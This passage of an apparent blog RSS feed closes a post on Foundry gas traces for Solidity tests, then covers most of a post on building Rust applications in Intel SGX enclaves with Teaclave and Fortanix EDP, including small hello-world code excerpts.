&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ├─ [20212] Storage::store(5)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    │   └─ ← ()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ├─ [246] Storage::retrieve() [staticcall]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    │   └─ ← 5&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ├─ [0] console::f5b1bba9(0000000000000000000000000000000000000000000000000000000000000005) [staticcall]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    │   └─ ← ()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    └─ ← ()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This shows the stack trace of every test, with each function call also showing its associated &lt;code&gt;gas&lt;&#x2F;code&gt; cost. Recall that &lt;code&gt;gas&lt;&#x2F;code&gt; in Ethereum is a measure of the cost of executing a certain operation; the higher it is, the more computationally expensive the code is. Because &lt;code&gt;gas&lt;&#x2F;code&gt; is ultimately paid in real money, optimizing it becomes extremely important.&lt;&#x2F;p&gt;
&lt;p&gt;In this case we can see that a call to &lt;code&gt;store&lt;&#x2F;code&gt; is an order of magnitude more expensive than &lt;code&gt;retrieve&lt;&#x2F;code&gt;, i.e., storing data is much more expensive than just reading it. Additionally, the second call to &lt;code&gt;retrieve&lt;&#x2F;code&gt; was about 10x cheaper than the first one. This is no bug: the EVM reduces the cost of a storage read if the variable in question has already been read from (i.e. if the variable is &lt;code&gt;warm&lt;&#x2F;code&gt;).&lt;&#x2F;p&gt;
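&lt;p&gt;Relatedly, if you want gas numbers aggregated per function rather than reading them off the traces, the Foundry book documents a gas report flag; a minimal invocation would be:&lt;&#x2F;p&gt;

```shell
# Run the test suite and print a per-contract, per-function gas usage table
forge test --gas-report
```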
&lt;h2 id=&quot;closing-thoughts&quot;&gt;Closing thoughts&lt;&#x2F;h2&gt;
&lt;p&gt;Foundry has a lot more features, including fuzz testing, forking from live networks, an array of cheatcodes, and more. For a deeper dive we highly recommend going directly to the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;book.getfoundry.sh&#x2F;&quot;&gt;Foundry book&lt;&#x2F;a&gt;; it is very easy to follow and has some thorough tutorials.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Secure computation in Rust: Using Intel&#x27;s SGX instructions with Teaclave and Fortanix</title>
          <pubDate>Thu, 05 May 2022 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/secure-computation-in-rust-using-intels-sgx-instructions-with-teaclave-and-fortanix/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/secure-computation-in-rust-using-intels-sgx-instructions-with-teaclave-and-fortanix/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/secure-computation-in-rust-using-intels-sgx-instructions-with-teaclave-and-fortanix/">&lt;p&gt;If you have been following this blog you should already know that I am a distributed system and Rust zealot.&lt;br &#x2F;&gt;
I started playing with Rust 2014 since it was implemented in OCaml, a language I love, and because it had green threads similar to the ones of Erlang. At the end of 2014, start of 2015 Rust’s runtime system and green-threading model was removed. I continued using Rust because of its great community and its C + ML roots. In addition to this it is a great complement to Erlang since it is has almost opposite semantics, specially in its error handling philosophy.&lt;&#x2F;p&gt;
&lt;p&gt;At the end of 2017 I started working in the crypto space, mostly because I needed the money. I’ve not been very public about it, since I was skeptical of the whole movement. Even though I liked working on the technical problems that appeared in the space, I thought that most crypto projects were Ponzi schemes or completely useless for users.&lt;&#x2F;p&gt;
&lt;p&gt;In these years I’ve met great engineers and technologies that made me believe more in the movement. That is one of the reasons we started working in the zero-knowledge proof space. One of the projects we are working on requires high standards of data security and privacy, so we need to abstract ourselves from potential OS security vulnerabilities on third-party servers.&lt;br &#x2F;&gt;
The following blog post follows our journey discovering Intel SGX and its integration in the development of Rust applications.&lt;&#x2F;p&gt;
&lt;p&gt;As you can already guess, this is a project full of challenges, from performance concerns to potential security issues. We want to shield ourselves from any OS security vulnerabilities the host devices might have, all the more so when the application is deployed in the cloud. So we’ve been tasked with deploying essential parts of the project in a specific Trusted Execution Environment (TEE for short): Intel’s SGX.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;Imagine you are building a piece of software which handles sensitive information, and that you decided to deploy your application in the cloud.&lt;&#x2F;p&gt;
&lt;p&gt;Since our project handles private keys used to access transactions and e-wallets, we need to ensure enhanced confidentiality and integrity, even in the presence of privileged malware at the OS, BIOS, VMM, or SMM layers.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;tees&quot;&gt;TEEs&lt;&#x2F;h3&gt;
&lt;p&gt;TEEs can be thought of as processes running “isolated” from the OS and upper layers in a secure part of the CPU, the idea being to significantly reduce the attack surface. TEEs aim to ensure some subset of data integrity, code integrity and data privacy, which fits our sensitive data manipulation needs. Each CPU vendor has their own implementation, some of which are:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Intel SGX&lt;&#x2F;li&gt;
&lt;li&gt;ARM TrustZone&lt;&#x2F;li&gt;
&lt;li&gt;AMD Secure Encrypted Virtualization&lt;&#x2F;li&gt;
&lt;li&gt;ZAYA TEE for RISC-V&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;From now on we’ll be focusing on Intel SGX.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;intel-sgx&quot;&gt;Intel SGX&lt;&#x2F;h3&gt;
&lt;p&gt;SGX is an Intel ISA extension with TEE support. The environments are called &lt;strong&gt;enclaves&lt;&#x2F;strong&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Some important aspects:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;It’s not possible to read nor write the enclave’s memory space from outside the enclave&lt;&#x2F;strong&gt; , regardless of the privilege level and CPU mode.&lt;&#x2F;li&gt;
&lt;li&gt;In production, it’s not possible to debug enclaves by software or hardware.&lt;&#x2F;li&gt;
&lt;li&gt;Entering the enclave via function calls, jumps or stack&#x2F;register manipulation is not possible. To do so you have to use a specific CPU instruction which also does some safety checks ([E]call, [O]call).&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Enclave’s memory is encrypted&lt;&#x2F;strong&gt; , and the key used changes on every power cycle. It’s stored within the CPU and is not accessible.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;Lb332Bp.png&quot; alt=&quot;&quot; &#x2F;&gt;Source: Microsoft Azure Confidential Computing &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;docs.microsoft.com&#x2F;en-us&#x2F;azure&#x2F;confidential-computing&#x2F;confidential-computing-enclaves&quot;&gt;Documentation&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Warning&lt;&#x2F;strong&gt; : if you are considering developing an SGX application, we’d highly suggest &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;ayeks&#x2F;SGX-hardware#desktop-cpus-affected-by-the-product-change-notification-from-2015&quot;&gt;checking whether your CPU&lt;&#x2F;a&gt; has SGX support. Intel’s C++ SDK has some simulation capabilities (as we’ll see later), but those aren’t fully fleshed out. We managed to run some sample projects on a MacBook Pro using Teaclave’s simulation mode… but at what cost? So, try running SGX on your M1 only if you like stepping on Legos for fun.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;hqeSchG.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h2 id=&quot;sgx-rust-development&quot;&gt;SGX Rust Development&lt;&#x2F;h2&gt;
&lt;p&gt;The Intel SGX’s SDK is implemented on C++, so usually you’ll implement your application using C&#x2F;C++ and their &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.intel.com&#x2F;content&#x2F;www&#x2F;us&#x2F;en&#x2F;developer&#x2F;tools&#x2F;software-guard-extensions&#x2F;get-started.html&quot;&gt;toolkit&lt;&#x2F;a&gt;.&lt;br &#x2F;&gt;
As a starting point Intel gives a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;intel&#x2F;linux-sgx&#x2F;tree&#x2F;master&#x2F;SampleCode&quot;&gt;couple of code examples&lt;&#x2F;a&gt; for different implementations.&lt;br &#x2F;&gt;
But would any developer worth their salt want to develop a solid blockchain project in those languages when you’ve got the hip and cool option that is Rust? (In fact, yes.) &lt;em&gt;We don’t look forward to that.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;Whhj2XE.png&quot; alt=&quot;&quot; &#x2F;&gt; Recreation of what the Rust SDK developers may have thought&lt;&#x2F;p&gt;
&lt;p&gt;Since our source code is already written in Rust we looked for crates that allow us an easy and seamless integration of our code with the SGX enclaves.&lt;br &#x2F;&gt;
We found 2 alternatives for this, which use different approaches. Both are open source:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Teaclave SGX SDK&lt;&#x2F;li&gt;
&lt;li&gt;Fortanix Enclave Development Platform&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h2 id=&quot;teaclave&quot;&gt;Teaclave&lt;&#x2F;h2&gt;
&lt;p&gt;It wraps the Intel SGX’s SDK. You can check their &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;apache&#x2F;incubator-teaclave-sgx-sdk&quot;&gt;GitHub repo&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;Bd8I1r5.png&quot; alt=&quot;&quot; &#x2F;&gt;Source: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.trentonsystems.com&#x2F;blog&#x2F;what-is-intel-sgx&quot;&gt;https:&#x2F;&#x2F;www.trentonsystems.com&#x2F;blog&#x2F;what-is-intel-sgx&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;With the Teaclave SDK you will split your application into two parts:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Trusted, also called the &lt;em&gt;enclave&lt;&#x2F;em&gt;.&lt;&#x2F;li&gt;
&lt;li&gt;Untrusted, called the &lt;em&gt;app&lt;&#x2F;em&gt;.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Remember, under the hood you’re still using Intel’s SDK library.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;ixchGF6.png&quot; alt=&quot;&quot; &#x2F;&gt;Source: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.infoq.com&#x2F;presentations&#x2F;intel-sgx-enclave&#x2F;&quot;&gt;https:&#x2F;&#x2F;www.infoq.com&#x2F;presentations&#x2F;intel-sgx-enclave&#x2F;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The Untrusted code is in charge of initializing and shutting down the enclave, and you have to define an interface for the app and the enclave to communicate with each other. During compilation, those interfaces get transformed into [E]calls and [O]calls. In the end you would end up with something like this:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;rzWrjSw.png&quot; alt=&quot;&quot; &#x2F;&gt;Source: Slide from Yu Ding’s &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.infoq.com&#x2F;presentations&#x2F;intel-sgx-enclave&#x2F;&quot;&gt;talk&lt;&#x2F;a&gt; at infoq about Intel SGX enclaves on Rust&lt;&#x2F;p&gt;
&lt;p&gt;But, as the saying goes, not everything that shines is gold. The enclave will run under &lt;code&gt;#[no_std]&lt;&#x2F;code&gt;, so keep in mind that your favorite crates might not be supported. That said, the maintainers have been porting and developing a bunch of useful crates to work with, and of course you can port the ones you want as well. Among them are &lt;code&gt;libc&lt;&#x2F;code&gt;, the &lt;code&gt;std&lt;&#x2F;code&gt; (or part of it), synchronization primitives (e.g. &lt;code&gt;SgxMutex&lt;&#x2F;code&gt;, &lt;code&gt;SgxRWLock&lt;&#x2F;code&gt;) and more. However, there is no support for async Rust yet.&lt;&#x2F;p&gt;
&lt;p&gt;The repo is populated with some sample projects, which are great for learning how a project is structured and which conventions you need to follow; you can also take some of them as templates for your own application.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;simulation-mode&quot;&gt;Simulation Mode&lt;&#x2F;h3&gt;
&lt;p&gt;Since under the hood it uses Intel’s SDK, you still need to meet the necessary requirements. However, Intel also provides simulation libraries (although those don’t have all the features implemented) which might come in handy to test your enclave locally despite not having an Intel processor.&lt;br &#x2F;&gt;
A Docker image is also available; you can check the details on how to run it &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;apache&#x2F;incubator-teaclave-sgx-sdk#running-without-intel-sgx-drivers&quot;&gt;here&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;fortanix-edp&quot;&gt;Fortanix EDP&lt;&#x2F;h2&gt;
&lt;p&gt;Fortanix EDP is developed by a company named &lt;em&gt;Fortanix&lt;&#x2F;em&gt;. From their website we read:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;Fortanix secures sensitive data across public, hybrid, multicloud and private cloud environments, enabling customers to operate even the most sensitive applications in any environment.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;They came up with a different solution to running Rust code on Intel enclaves.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;M5pt0Zd.png&quot; alt=&quot;&quot; &#x2F;&gt;Source: Fortanix EDP &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;edp.fortanix.com&#x2F;docs&#x2F;concepts&#x2F;architecture&#x2F;&quot;&gt;architecture documentation&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;First, instead of building both an &lt;em&gt;app&lt;&#x2F;em&gt; and an &lt;em&gt;enclave&lt;&#x2F;em&gt;, Fortanix EDP helps you build only the enclave; the way the app and the enclave communicate is up to you.&lt;&#x2F;p&gt;
&lt;p&gt;The enclave runner is responsible for initializing and shutting down enclaves, and for handling the enclave’s needs via a usercall interface.&lt;&#x2F;p&gt;
&lt;p&gt;Since it avoids this interfacing between app and enclave, it removes a lot of bureaucracy regarding project structure and setup. This was one of the benefits considered when &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;apache&#x2F;tvm&#x2F;issues&#x2F;2887&quot;&gt;TVM swapped Teaclave for Fortanix&lt;&#x2F;a&gt;. You can also see from this Fortanix &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;fortanix&#x2F;rust-sgx&#x2F;tree&#x2F;master&#x2F;examples&#x2F;mpsc-crypto-mining&quot;&gt;example crate&lt;&#x2F;a&gt; that only a few lines were added to the &lt;code&gt;Cargo.toml&lt;&#x2F;code&gt;; the rest is a standard pure Rust project.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;supported-crates-and-std-caveats&quot;&gt;Supported crates and std caveats&lt;&#x2F;h3&gt;
&lt;p&gt;Of course, most of the time there’s going to be a catch. You might sometimes need to create an implementation of a crate for the SGX target. The process is &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;edp.fortanix.com&#x2F;docs&#x2F;tasks&#x2F;dependencies&#x2F;&quot;&gt;documented&lt;&#x2F;a&gt; as well. Also, some crates have been adding SGX support for the &lt;code&gt;x86_64-fortanix-unknown-sgx&lt;&#x2F;code&gt; target, such as the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;rust-random&#x2F;rand&#x2F;pull&#x2F;680&#x2F;files&quot;&gt;rand&lt;&#x2F;a&gt; crate.&lt;&#x2F;p&gt;
&lt;p&gt;This project is already a tier 2 target for the Rust compiler (more on &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;doc.rust-lang.org&#x2F;nightly&#x2F;rustc&#x2F;platform-support.html#tier-2&quot;&gt;Rust tiers&lt;&#x2F;a&gt;), and that’s great news! It’s based on &lt;code&gt;libstd&lt;&#x2F;code&gt;, a choice that has its drawbacks since it assumes &lt;code&gt;time&#x2F;net&#x2F;env&#x2F;thread&#x2F;process&#x2F;fs&lt;&#x2F;code&gt; are implemented. Some of those are still not implemented (&lt;code&gt;fs&lt;&#x2F;code&gt;, for example) and will panic at runtime instead of failing at compile time, breaking Rust’s philosophy of “if it compiles, it works”. More info on &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;edp.fortanix.com&#x2F;docs&#x2F;concepts&#x2F;rust-std&#x2F;&quot;&gt;Rust std support&lt;&#x2F;a&gt; in Fortanix’s documentation.&lt;&#x2F;p&gt;
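&lt;p&gt;To illustrate how you might guard against those runtime panics, here is a hypothetical sketch using conditional compilation. The &lt;code&gt;target_env = &quot;sgx&quot;&lt;&#x2F;code&gt; key corresponds to the &lt;code&gt;x86_64-fortanix-unknown-sgx&lt;&#x2F;code&gt; triple; the function name and the fallback behavior are our own invention, not part of EDP:&lt;&#x2F;p&gt;

```rust
// Hypothetical sketch: keep `std::fs` out of the enclave build entirely, so
// the SGX target never reaches the shims that panic at runtime.
fn load_config() -> String {
    #[cfg(target_env = "sgx")]
    {
        // Inside the enclave, reading a file would compile but panic at
        // runtime, so fall back to a compiled-in default instead.
        String::from("default-config")
    }
    #[cfg(not(target_env = "sgx"))]
    {
        // Outside the enclave the filesystem works as usual; the path here
        // is just illustrative.
        std::fs::read_to_string("/nonexistent/config.toml")
            .unwrap_or_else(|_| String::from("default-config"))
    }
}
```

&lt;p&gt;This way the unsupported module is compiled out of the SGX build instead of surprising you at runtime.&lt;&#x2F;p&gt;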
&lt;h3 id=&quot;i-o&quot;&gt;I&#x2F;O&lt;&#x2F;h3&gt;
&lt;p&gt;The recommended way of handling input&#x2F;output in the enclave is via byte streams, particularly using &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;edp.fortanix.com&#x2F;docs&#x2F;concepts&#x2F;rust-std&#x2F;#stream-networking&quot;&gt;&lt;code&gt;TcpStream&lt;&#x2F;code&gt;&lt;&#x2F;a&gt;, and using TLS on top of that is strongly suggested (Transport Layer Security is the protocol that provides secure communication over a network, best known for its use in &lt;em&gt;https&lt;&#x2F;em&gt;).&lt;br &#x2F;&gt;
There are primitives for dealing with pointers to user space as well. These primitives use Rust’s borrowing and ownership mechanism to avoid data races among other issues, and they also prevent creating dangerous Rust references to user memory. Still, using &lt;code&gt;TcpStream&lt;&#x2F;code&gt; is preferred.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;an-example-using-both-fortanix-and-teaclave&quot;&gt;An example using both Fortanix and Teaclave&lt;&#x2F;h2&gt;
&lt;p&gt;We’re going to show a simplified version of the hello-world &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;apache&#x2F;incubator-teaclave-sgx-sdk&#x2F;tree&#x2F;master&#x2F;samplecode&#x2F;hello-rust&quot;&gt;example&lt;&#x2F;a&gt; from the Teaclave repo and see how we would do a similar thing using Fortanix’s EDP.&lt;&#x2F;p&gt;
&lt;p&gt;We’ll be omitting some details, so if you’re interested in getting them we suggest that you check out Teaclave’s repo.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;teaclave-1&quot;&gt;Teaclave&lt;&#x2F;h3&gt;
&lt;p&gt;The project structure is:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;mm0n8rE.png&quot; alt=&quot;&quot; &#x2F;&gt;Example of project structure using Teaclave&lt;&#x2F;p&gt;
&lt;p&gt;Notice that we have the &lt;code&gt;app&#x2F;&lt;&#x2F;code&gt; and the &lt;code&gt;enclave&#x2F;&lt;&#x2F;code&gt; directories. First let’s see the app’s code:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;extern {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    fn say_something(eid: sgx_enclave_id_t, retval: *mut sgx_status_t,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                     some_string: *const u8, len: usize) -&amp;gt; sgx_status_t;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;We define the function that we want to run in the enclave as an external function. Notice that we are not using Rust’s &lt;code&gt;String&lt;&#x2F;code&gt; here; we need to pass the raw parts instead.&lt;&#x2F;p&gt;
&lt;p&gt;You need to initialize the enclave with a &lt;code&gt;SgxEnclave::create&lt;&#x2F;code&gt; call before running code on it. Remember to &lt;strong&gt;always initialize&lt;&#x2F;strong&gt; the enclave first.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Initialize the enclave - proceed on success&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let enclave = match init_enclave() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Ok(r) =&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        println!(&amp;quot;[+] Init Enclave Successful {}!&amp;quot;, r.geteid());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        r&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    },&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Err(x) =&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        println!(&amp;quot;[-] Init Enclave Failed {}!&amp;quot;, x.as_str());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        return;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    },&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;};&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let input_string = String::from(&amp;quot;This is a normal world string passed into Enclave!\n&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let mut retval = sgx_status_t::SGX_SUCCESS;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Then we make the &lt;code&gt;[E]call&lt;&#x2F;code&gt; into the enclave. This needs to be wrapped in an unsafe block, and we need to split the String into its raw pointer and length.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let result = unsafe {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    say_something(enclave.geteid(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                  &amp;amp;mut retval,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                  input_string.as_ptr() as * const u8,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                  input_string.len())&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;};&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The &lt;code&gt;[E]call&lt;&#x2F;code&gt; returns an &lt;code&gt;sgx_status_t&lt;&#x2F;code&gt; that we can check to see whether the enclave ran successfully.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;match result {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    sgx_status_t::SGX_SUCCESS =&amp;gt; {},&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    _ =&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        println!(&amp;quot;[-] ECALL Enclave Failed {}!&amp;quot;, result.as_str());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        return;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;println!(&amp;quot;[+] say_something success...&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;You have to destroy the enclave before exiting. The documentation reads:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;It is highly recommended that the sgx_destroy_enclave function be called after the application has finished using the enclave to avoid possible deadlocks.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;enclave.destroy();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Now into the enclave’s code:&lt;&#x2F;p&gt;
&lt;p&gt;Each &lt;code&gt;[E]call&lt;&#x2F;code&gt; should follow the signature &lt;code&gt;#[no_mangle] pub extern &quot;C&quot; fn func_name(args) -&amp;gt; sgx_status_t&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;#[no_mangle]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub extern &amp;quot;C&amp;quot; fn say_something(some_string: *const u8, some_len: usize) -&amp;gt; sgx_status_t &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Again, we need the unsafe block to call &lt;code&gt;from_raw_parts&lt;&#x2F;code&gt; and we get our string slice back.&lt;&#x2F;p&gt;
